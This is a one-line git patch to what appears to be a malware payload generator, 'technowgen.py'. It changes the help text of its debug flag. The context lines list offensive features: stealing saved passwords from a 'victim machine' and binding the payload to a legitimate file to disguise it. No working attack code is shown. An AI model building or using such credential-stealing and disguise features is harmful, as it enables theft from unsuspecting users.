From 01f51313f8b00e150632ab5f42e7f32436b2ca08 Mon Sep 17 00:00:00 2001 From: Pushpender <56433698+Technowlogy-Pushpender@users.noreply.github.com> Date: Sun, 19 Apr 2020 15:10:44 +0530 Subject: [PATCH] Updated to v1.8 --- technowgen.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technowgen.py b/technowgen.py index 2d97f00..d24d6bf 100644 --- a/technowgen.py +++ b/technowgen.py @@ -27,7 +27,7 @@ def get_arguments(): parser.add_argument("-l", "--linux", dest="linux", help="Generate a Linux executable.", action='store_true') parser.add_argument("-s", "--steal-password", dest="stealer", help=f"Steal Saved Password from Victim Machine [{RED}Supported OS : Windows{YELLOW}]", action='store_true') parser.add_argument("-b", "--bind", dest="bind", help="AutoBinder : Specify Path of Legitimate file.") - parser.add_argument("-d", "--debug", dest="debug", help="Payload Will Not Run In Background, Will Open A Cmd When Payload is Executed", action='store_true') + parser.add_argument("-d", "--debug", dest="debug", help="Payload Will Run In Foreground with CMD Window, To get Appropriate Execution Error", action='store_true') required_arguments = parser.add_argument_group(f'{RED}Required Arguments{GREEN}')